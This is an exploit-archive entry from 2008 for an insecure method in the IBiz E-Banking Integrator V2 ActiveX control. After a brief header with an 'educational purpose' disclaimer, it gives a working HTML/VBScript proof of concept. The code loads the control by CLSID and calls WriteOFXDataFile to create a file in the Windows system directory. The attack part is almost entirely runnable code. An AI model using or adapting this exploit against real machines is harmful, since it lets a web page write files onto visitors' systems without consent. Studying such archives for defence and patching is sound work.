IBiz E-Banking Integrator V2 ActiveX Edition Insecure Method Exploit

2008-04-09
ID: 9181
CVE: None
Download vulnerable application: None
--------------------------------------------------------------------
 IBiz E-Banking Integrator V2 ActiveX Edition Insecure Method
  Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
  This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
  More info at http://shinnai.altervista.org
--------------------------------------------------------------------
<object classid='clsid:24445430-F789-11CE-86F8-0020AFD8C6DB' id='test'></object>
 <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
 <script language='vbscript'>
 Sub tryMe()
  On Error Resume Next
   test.WriteOFXDataFile "C:\WINDOWS\system_.ini"
   If Err.Number <> 0 Then
    MsgBox "Something went wrong!"
   Else
    MsgBox "Exploit Completed!"
   End If
 End Sub
</script>
1-4-2 (www02)